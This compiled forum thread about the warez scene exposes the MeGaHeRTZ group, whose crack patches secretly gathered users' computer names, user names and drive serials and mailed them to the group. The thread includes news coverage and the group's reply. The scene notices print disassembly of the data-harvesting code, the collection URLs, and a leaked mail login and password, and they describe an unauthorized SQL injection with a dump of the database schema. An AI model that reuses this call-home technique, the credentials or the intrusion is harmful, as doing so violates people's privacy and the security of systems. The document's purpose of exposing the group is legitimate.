Scene Group "MEGAHERTZ" Exposed Gathering Intel on People Using Their Patches


Scene Group "MEGAHERTZ" Exposed Gathering Intel on People Using Their Patches


   I downloaded a release from MeGaHeRTZ earlier but noticed quickly that the    firewall went off as it attempted to do communication on port 25. Strange,    so I started to debug this and quickly realized that their patch was far    from a simple patch - it had been coded to gather information from the    computer it was installed on, and then send that information to predefined    email accounts.   2013-04-16 - Malwarebytes.Anti-Malware.Pro.v1.75.0.1300.Incl.Patch-MeGaHeRTZ   Now, why would you reference WINSOCK.DLL in a patch? Let's see what we can    find when we look at this patch in a debugger.      00404462  |.  50            PUSH EAX   00404463  |.  68 01000000   PUSH 1   00404468  |.  68 9AAB4700   PUSH megahert.0047AB9A        ;  ASCII "http://"   0040446D  |.  E8 5E020400   CALL megahert.004446D0   00404472  |.  50            PUSH EAX   00404473  |.  50            PUSH EAX   00404474  |.  68 01000000   PUSH 1   00404479  |.  68 32000000   PUSH 32   0040447E  |.  E8 E8070300   CALL megahert.00434C6B   00404483  |.  E8 0A040400   CALL megahert.00444892   004042DF  |.  50            PUSH EAX   004042E0  |.  68 0DA14700   PUSH megahert.0047A10D        ;  ASCII "%20"   004042E5  |.  68 09A14700   PUSH megahert.0047A109   004042EA  |.  8B5424 10     MOV EDX,DWORD PTR SS:[ESP+10]   004042EE  |.  E8 DD030400   CALL megahert.004446D0   004042F3  |.  50            PUSH EAX   004042F4  |.  E8 F7030400   CALL megahert.004446F0   004042F9  |.  BA 09A14700   MOV EDX,megahert.0047A109   004042FE  |.  E8 ED030400   CALL megahert.004446F0   00404303  |.  8B5424 18     MOV EDX,DWORD PTR SS:[ESP+18]   00404307  |.  E8 E4030400   CALL megahert.004446F0   0040430C  |.  BA 59A84700   MOV EDX,megahert.0047A859 							   ;  ASCII " | Computer name: '"   00404311  |.  E8 DA030400   CALL megahert.004446F0   00404316  |.  E8 B5030400   CALL megahert.004446D0   0040431B  |.  50            PUSH EAX   0040431C  |.  50            PUSH EAX   0040431D  |.  E8 DE780000   CALL megahert.0040BC00   00404322  |.  58            POP EAX   00404323  |.  BA 85A44700   MOV EDX,megahert.0047A485                                               ;  ASCII "' - User: '"   00404328  |.  E8 C3030400   CALL megahert.004446F0      So - why would a patch need to gather username, computer name and IP-address?    Let's take a look at what it puts together;       Malwarebytes Anti-Malware Pro v1.x | Computer name: '*E****-D*F6****' -    User: 'Administrator'.       The computer name is actually the drive serial gathered from the Windows API;    and then this is sent to:       - [email protected]   - [email protected]        A backup email running at:       - [email protected]      The emails were sent through http://mhzgroup.altervista.org/SendMailText.php    which has since been shut down due to abuse - so it's likely they gathered    quite a bit of information.   Did these guys get infected and unknowingly send out malware? Definitively    not, this was deliberately made - you can find similar approaches in    several of their releases and thus it's important that sites and users are    aware that if you use their releases, you are indeed using and installing    malware.    NOTE: Several of their releases was checked and contained the same methods,   so this is not just a random incident!      Nuke and Wipe these releases and make sure that the group no longer is able    to be raced on sites.      TAKE OUT THE TRASH; TODAY!
---------------8<-------[CUT HERE]-----------------------------------------------------Releaser: Xylitol/REDWebScene warning: 02 September 2013Before "MEGAHERTZ.EXPOSED.GATHERING.INTEL.ON.PEOPLE.REMOVE.THEM.V2013.READ.NFO-SNOWDEN"Attachement: SQL Dump of the lamers, 0day scene should know about this.---------------8<-------[CUT HERE]-----------------------------------------------------Hey guys, i came across recently to a scene release done by team MeGaHeRTZ"Malwarebytes.Anti-Malware.Pro.v1.75.0.1300.Incl.Patch-MeGaHeRTZ"First time i hear of them... and after some search.. this team worry me.Their ethics are "misaligned" and the quality isn't really here.At first let's talk about the quality.I've searched a bit about this team and found a NFO of 2009:+-----------------------------------------------------------------------------+¦ __ __ _____ _ _ _____ _______ ______ ¦¦ | \/ | / ____| | | | | | __ \__ __|___ / ¦¦ | \ / | ___| | __ __ _| |_| | ___| |__) | | | / / ¦¦ | |\/| |/ _ \ | |_ |/ _` | _ |/ _ \ _ / | | / / ¦¦ | | | | __/ |__| | (_| | | | | __/ | \ \ | | / /__ ¦¦ |_| |_|\___|\_____|\__,_|_| |_|\___|_| \_\ |_| /_____| ¦¦ ¦¦-----------------------------------------------------------------------------¦¦ ReLeaSe iNFo ¦ ReLeaSe iNFo ¦¦--------------------------------------+--------------------------------------¦¦ SoFT NaMe ¦ iDailyDiary Professional v3.52 ¦¦--------------------------------------+--------------------------------------¦¦ uRL ¦ http://www.splinterware.com ¦¦--------------------------------------+--------------------------------------¦¦ WoRKeR ¦ ALAN^MeGaHeRTZ ¦¦--------------------------------------+--------------------------------------¦¦ ReLeaSe TYPe ¦ Cracked EXE ¦¦--------------------------------------+--------------------------------------¦¦ CRaCKiNG DaTe ¦ 2009/01/20 ¦¦--------------------------------------+--------------------------------------¦¦ SoFTWaRe iNFo ¦ SoFTWaRe iNFo ¦¦-----------------------------------------------------------------------------¦¦ iDailyDiary provides a simple interface that immediately ¦¦ gets you started taking daily notes, creating a journal, ¦¦ putting your thoughts into writing and much more. ¦¦ ¦¦ ¦¦-----------------------------------------------------------------------------¦¦ iNSTaLL NoTeS ¦ iNSTaLL NoTeS ¦¦-----------------------------------------------------------------------------¦¦ Install the Software ¦¦ Check if the Software *IS NOT* Running ¦¦ Use the *CRACK* button to Register ¦¦ ¦¦ ¦¦-----------------------------------------------------------------------------¦¦ MeGaHeRTZ TeaM ¦ MeGaHeRTZ TeaM ¦¦--------------------------------------+--------------------------------------¦¦ ALAN ¦ FouNDeR/CRaCKeR/CoDeR/WeB {aMY+PC} ¦¦ BaTMaN ¦ GFX {aMY+PC+MaC} ¦¦ BiLLY THe KiD ¦ WaReZ GaMeS+MoVie+XXX {PC} ¦¦ CoBRa ¦ WaReZ MoVie+GaMeS {PC+CoNSoLe} ¦¦ GuMP ¦ WeBDeSiGNeR {PC} ¦¦ LaZaRuS ¦ CoDeR {LiNuX} ¦¦ NeMBo KiD ¦ WaReZ MoVie+SoFT {PC} ¦¦ RiGeL ¦ WaReZ MoVie+GaMeS {PC} ¦¦ SHaDiNG ¦ CoDeR {LiNuX} ¦¦ SuBCuZZ ¦ CoDeR {PC} ¦¦ Toi ¦ WaReZ GaMeS {PC+CoNSoLe} ¦¦ ToYBoX MaN ¦ WaReZ MoVie+TooNS+XXX {PC} ¦¦ TuLiPaNo NeRo ¦ CoDeR+GFX {PC} ¦¦ ViCu ¦ WeBDeSiGNeR {PC+MaC} ¦¦ Y-PRoF ¦ CoDeR STuDeNT {PC+LiNuX} ¦¦-----------------------------------------------------------------------------¦¦ oLD MeGaHeRTZ TeaM / NoW ReTiReD ¦ oLD MeGaHeRTZ TeaM / NoW ReTiReD ¦¦--------------------------------------+--------------------------------------¦¦ aDiDaS ¦ WaReZ GaMeS+SoFT {aMY+PC} ¦¦ aNDRo ¦ WaReZ GaMeS+SoFT {aMY+PC+CoNSoLe} ¦¦ CYBeRMaSTeR ¦ WaReZ GaMeS+SoFT {aMY+PC+MaC} ¦¦ DaNGeRouS ¦ WaReZ GaMeS {aMY} ¦¦ eNiGMa ¦ WaReZ GaMeS+SoFT {aMY+PC+MaC} ¦¦ GiaNX ¦ WaReZ GaMeS STuDeNT {aMY} ¦¦ HaWK ¦ GFX {PC} ¦¦ HYRoSHiMa ¦ WaReZ GaMeS+SoFT {aMY+PC+CoNSoLe} ¦¦ KiNG WoLF ¦ WaReZ GaMeS STuDeNT {aMY} ¦¦ KYX ¦ WaReZ GaMeS+SoFT {aMY+PC+LiNuX} ¦¦ L-STYLe ¦ WaReZ GaMeS {aMY} ¦¦ LoRD MaRiaN ¦ WaReZ GaMeS {aMY} ¦¦ MaD MaX ¦ WaReZ GaMeS STuDeNT {PC} ¦¦ MaRaDoNa ¦ WaReZ GaMeS STuDeNT {C64} ¦¦ MiSTeR TaPPaRo ¦ WaReZ GaMeS {aMY+PC} ¦¦ MiSTeR X ¦ WaReZ SoFT {aMY+PC} ¦¦ SuKeBe ¦ WaReZ GaMeS {aMY} ¦¦ WaLCoM ¦ WaReZ SoFT {aMY+PC} ¦¦ XiaN ¦ WaReZ GaMeS+SoFT {aMY+PC+CoNSoLe} ¦¦--------------------------------------+--------------------------------------¦¦ CoNTaCTS ¦ CoNTaCTS ¦¦--------------------------------------+--------------------------------------¦¦ MaiL ¦ [email protected] ¦¦ WeBSiTe ¦ http://mhzgroup.true.ws ¦¦ MeSSeNGeR ¦ [email protected] ¦¦--------------------------------------+--------------------------------------¦¦ GReeTiNG ¦ GReeTiNG ¦¦-----------------------------------------------------------------------------¦¦ ACME - AGAiN - AGGRESSiON - ARN - ArTeam - Bidjan - CHiCNCREAM - C.O.R.E. ¦¦ CROSSFiRE - CRUDE - diGERATi - dT - ECLiPSE - f4cg - F.F.F. ¦¦ FOSI - ICU - iNFECTED - iNFERNO - LasH - LUCiD - Lz0 - MP2K - NiTROUS ¦¦ PARADOX - SCOTCH - SnD - SSG - RESURRECTiON - TMG - TSRh - UIC ¦¦ UnderPL - VDown - ViRiLITY - YAG - Z.W.T ¦+-----------------------------------------------------------------------------+=nMeGaHeRTZ looks like a 0day group, i don't know with who they are affiliated but...Look at the NFO, seem it's a well structured group, i've searched and never see a video or a game releasefrom them.After i don't know well the Italian scene so i'm not the best to talk about Italian groups.The only guys i've hear of is Rigel. (who moved to TSRh if i remember)Well, le'ts skip the member list part and see the "greetings" part."AGGRESSiON - ARN" ARN is the acronyme of Agression so why they are in double ?And this chars at the end '=n' why did they have a sort of byte-order mark on the NFO an error maybe ?Let's have a look on the NFO of the concerned release now (Malwarebytes)_____ ________ ___ ___ _____________________________/ \ ____ / _____/_____ / | \ ____\_____ \__ ___/\____ // \ / \_/ __ \/ \ ___\__ \ / ~ \_/ __ \| _/ | | / // Y \ ___/\ \_\ \/ __ \\ Y /\ ___/| | \ | | / /_\____|__ /\___ >\______ (____ /\___|_ / \___ >___|_ / |___ \ /_______ \\/ \/ \/ \/ \/ \/ \/ \/ \/*PRESENTS A NEW 0-DAY RELEASE*________________________________________________________________________________¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯SoFT NaMe ........................... Malwarebytes.Anti-Malware.Pro.v1.75.0.1300ReLeaSe-TyPe .............................................................. uTiLoS ...................................................................... WiNaLLWeBSiTe ........................................... http://www.malwarebytes.org/CRaCKeD By............................................................. MoS 6510CRaCK-TyPe ........................................................ *PaTCH V1.0*PuBLiSHeD oN ........................................................ 2013/04/16DeSCRiPTioN:aCTiVeLy PRoTeCT aGaiNST aLL FoRMS oF MaLWaReiMPRoVe youR PRoTeCTioN WiTHouT CHaNGiNG youR aVReNoWNeD PRoTeCTioN aND CLeaNuP TeCHNoLoGieSTooL MoST ReCoMMeNDeD By TeCHS aND SuPeR uSeRSiNSTaLL NoTeS:1) iNSTaLL *SoFTWaRe* aND iF aSK DoN'T RuN/ReBooT2) MaKe SuRe THaT SoFTWaRe iS *NoT* RuNNiNG3) eXeCuTe *MeGaHeRTZ* aND CLiCK oN *PaTCH* BuTToN,î+4Simple, clean.",î+4" Same shit here, i don't know how they package their releases but they have a problem.Now after the sloppy NFOs we have the sloppy releases:MeGaHeRTZ is on the 0day scene.. that okDid they even know the 0day scene rules ?"DVDFab.9.v9.0.2.6.Incl.Loader-MeGaHeRTZ"A Loader... are these guys serious ? this release got nuked for this.But it's a double fail: the release even don't work properly. (cant convert multiple audio tracks onblu ray ripping)Something weird: you can't close it (to close the release you need to successful path the application)Otherwise you have to kill the process...What's happend when you use their patch ?Users who use their releases are tracked for internal statistics.You don't believe me ? ok just read the strings:0040BC2D . 50 PUSH EAX ; /pBufferSize0040BC2E . 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] ; |0040BC32 . 50 PUSH EAX ; |Buffer0040BC33 . E8 92F40500 CALL 0046B0CA ; \GetComputerNameA0040BC9E . 50 PUSH EAX ; /pBufCount0040BC9F . 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4] ; |0040BCA3 . 50 PUSH EAX ; |Buffer0040BCA4 . E8 5D240600 CALL 0046E106Shits is parsed like this:ASCII "Malwarebytes Anti-Malware Pro v1.x | Computer name: 'XYL2K-E87171510' - User: 'Administrateur'"Then they replace the spaces by '%20' hex encode for web.ASCII "http://usages.kickme.to"Mail proc:0040454C |. 68 90A84700 PUSH 47A890 ; ASCII "smtp.mail.yahoo.com"00404551 |. E8 46890200 CALL 0042CE9C ; Dumped_.0042CE9C00404556 |. 89C3 MOV EBX,EAX00404558 |. 83FB 01 CMP EBX,10040455B |. 0F85 C4010000 JNZ 00404725 ; Dumped_.0040472500404561 |. E8 6A010400 CALL 004446D0 ; Dumped_.004446D000404566 |. 50 PUSH EAX00404567 |. 68 CBA74700 PUSH 47A7CB ; ASCII "alanmhz"0040456C |. 68 30A04700 PUSH 47A030 ; ASCII "mhz_group_check"There is the same mail adress "[email protected]" on the MeGaHeRTZ NFO of 2009.And for the password 'alan'.. if you read the 2009 NFO this guys is the founder.ASCII "http://mhzgroup.altervista.org/usageupdate.php?soft=Malwarebytes Anti-Malware Pro&ver=v1.x"There is no backconnect facility, c&c and cie but... grabbing the pc name and current user for releasetracking ? why ?!And the most dramatic thing it's that they don't know how to code properly in PHP...They are vulnerable to SQL injection, for a 0day team it's really lame.current database: 'my_megahertzng'current user: 'megahertzng@localhost'privilege: USAGEprivilege: USAGE[*] information_schema[*] my_megahertzngDatabase: my_megahertzng[4 tables]+---------+| release || diary || request || uses |+---------+Table: uses[4 columns]+----------+--------------+| Column | Type |+----------+--------------+| build | varchar(50) || id | int(11) || softname | varchar(100) || uses | int(11) |+----------+--------------+Table: request[4 columns]+----------+--------------+| Column | Type |+----------+--------------+| user | varchar(50) || note | varchar(200) || softname | varchar(100) || status | varchar(100) |+----------+--------------+Table: diary[4 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| date | date || softname | varchar(100) || softpatch | varchar(200) || type | int(11) |+-----------+--------------+Table: release[7 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| date | date || build | varchar(50) || id | int(11) || patch | varchar(50) || requested | varchar(50) || softhouse | varchar(50) || softname | varchar(100) |+-----------+--------------+I'm not here to do a dramascene, but people should know about this group and their 'tracked' releases.Last fun things is from MalwareBytes, they are know for adding signatures on keygens and patch,usually MalwareBytes do 'Dont.Steal.Our.Software'Malwarebytes.Anti-Malware.1.46.keygen-SND: Dont.Steal.Our.SoftwareMalwarebytes.Anti-Malware.Pro.v1.75.0.1300.Incl.Patch-MeGaHeRTZ: Trojan.CallHome.Mhz


public Source: http://scenenotice.org

Previous info:

Source: scenenotice.org

:) Those are links to the notice I posted. Here is link of NFO and source of your original article:


source: scenenotice.org

I didn't understand all that much here, but if I have a MeGaHeRTZ cracked app on my PC, will uninstall with Revo be enough, or do I need to re-format?

I didn't understand all that much here, but if I have a MeGaHeRTZ cracked app on my PC, will uninstall with Revo be enough, or do I need to re-format?

From the article it's clear their releases don't work, but if it's better to uninstall and use another fix from another group. You should definitely delete the fix u downloaded. Reformatting should be unnecessary.

Ok, thanks.

I didn't understand all that much here, but if I have a MeGaHeRTZ cracked app on my PC, will uninstall with Revo be enough, or do I need to re-format?

From the article it's clear their releases don't work, but if it's better to uninstall and use another fix from another group. You should definitely delete the fix u downloaded. Reformatting should be unnecessary.

Piracy Release Group Has Been Spying on Downloaders For 9 Months

While viruses and malware can be added to any file online, it is rare for malicious content to planted by those in the so-called warez scene. Nevertheless, it has now been revealed that since February 2013 one particular group has been dropping a little something extra into its cracked software releases. Anyone who has installed the group’s software patches may well have had their username, hard drive serial, computer name and IP address emailed out without their knowledge.


If the RIAA and MPAA are to be believed, torrent and other file-sharing sites are incredibly dangerous places. Anyone visiting them should be prepared to become infected with a virus, infiltrated by malware, or be otherwise exposed to similar threats.

The actual situation is nowhere near as bad as some would like to make out, but every now and again something happens to remind us that it is very possible for something nasty to slip through the net.

On February 12, 2013 a new warez group appeared calling themselves MeGaHeRTZ. Their first release was BurnAware Professional v6.0 plus a patch to remove the software’s protection. Over the months that followed the group released a lot of noteworthy products such as SmartFTP, DVDFab, FlashFXP, Incredimail, Traktor and hundreds more, each with the obligatory ‘freebie’ patch.

Tomorrow the group will have been operating for a full nine months and during that time their releases have spread to every corner of the Internet. However, far from merely wanting to do downloaders a favor, MeGaHeRTZ have been playing a little dirty.

A small sample of MeGaHeRTZ releases


Over the weekend a notice spread around the warez scene which detailed how one individual became alarmed by unusual firewall activity after he had installed, ironically, a MeGaHeRTZ release of Malwarebytes Anti-Malware Pro.

The problem reportedly came from patch that MeGaHeRTZ supplied with the release which attempted to send out traffic on port 25, a port commonly used to send email. The same individual who found the strange activity then ran the patch through a debugger and to his alarm found that it was harvesting information from the host machine.

The data being gathered from infected machines includes the username, computer name/drive serial obtained from the Windows API, and the host machine’s IP address. This information is then packaged up and sent off to any of three predetermined email addresses, all of which have account names containing some variation of the MeGaHeRTZ group name.

Further tests were carried out on several other MeGaHeRTZ releases and they were all found to carry similar mechanisms for pulling data from host machines and funneling it back to the release group.

The scene reacts – all MeGaHeRTZ releases get nuked


Quite what MeGaHeRTZ intend to do with the data is unclear but it appears that as an active release group they are now finished, at least under their current identity. On Saturday the warez scene took action to ‘nuke’ every MeGaHeRTZ release, which means they won’t be allowed to release anymore.

Revealing malware in scene releases is a very unusual occurrence and malicious content is usually added at a later stage by third parties. Still, the damage has now been done. MeGaHeRTZ releases are now all over the Internet and there is nothing that anyone can do to get them back. Avoidance is the only solution now.

Source: TorrentFreak

We are here to reply about unjustified charges contained in this document:

We dont stole any data from pc users, simple use PC NAME and PC USER O.S.
functions, as you can see in this well-explained document, to create an
internal Database of all our patch and unique utilizer, this is only for
statistical purphoses and for give us a turn back of real useful software
and real unuseful ones.
We are really sorry for this trouble and we have already fixed our patcher
to send us only software name and software build from the upcoming next
releases, we dont read anymore any data from pc user, you can see yourself
using any http packet analyzer.
We borned in 1991 when internet does not exists, we simple send our releases
by floppy only to our friends, only in last few years we made some works
published on internet without publicizing them, and only in latest time we
publish something on 0-day scene.
If 0-day scene dont want more us is not a problem, we continue to send our
works over internet in all possible ways.
We have a lot of peoples, that know how to personally contact us, that
continuosly ask us for custom software request, so scene distribution is
not a real problem for us.
If scene can give us another chance so will be happy for this.
But please dont tell that our team is linked with prism, snowden or any
type of american spy systems. God kill the americans.
About nfo last bytes they are simple the CRC-Check of file, if is corrupt
or modified by anyone so the patcher does not work, is only to avoid
lamer capture of our releases.

They can lick my hairy b@lls. :)

I don't have any knowledge at all about making softwares or patches, but what does PC Name have to do with usage statistics? Even if it's only for statistical purpose, shouldn't they make some kind of option to opt in or out like some softwares do?

we don't read anymore any data from pc user

What, they didn't realize what a no-no this was before? Especially in the current privacy climate? Collecting/stealing personal info and then emailing it under the radar without the user being aware of it or with anyway of stopping it, that's just what malware/adware/keyloggers do. Saying "we wont do it anymore" after being caught red handed, they must really be stupid. Or think we are stupid.

God kill the americans.

:mellow: :blink: :wtf:

MeGaHeRTZ warez group silently spreading malware


File-sharing sites and torrents are dangerous places by definition, as one can easily become infected with a nasty virus. It is rare for the so-called warez scene to expose its users to malware directly; usually it’s added later by third parties. Unfortunately not all groups seem to play by these rules: As of Saturday, all releases by a group called MeGaHeRTZ were officially nuked by the warez community for embedding malware in scene releases and harvesting information from host machines. Ironically, the first user to report unusual activity had just installed a MeGaHeRTZ release of Malwarebytes Anti-Malware Pro. Since February, dozens of infected MeGaHeRTZ “crack” patches have been extracting data from host machines including username, computer name, drive serial obtained via the Windows API, and IP address. As there is no way to delete every single copy of these “tainted” releases that are now spread all over the World Wide Web, avoidance of such releases is strongly recommended.

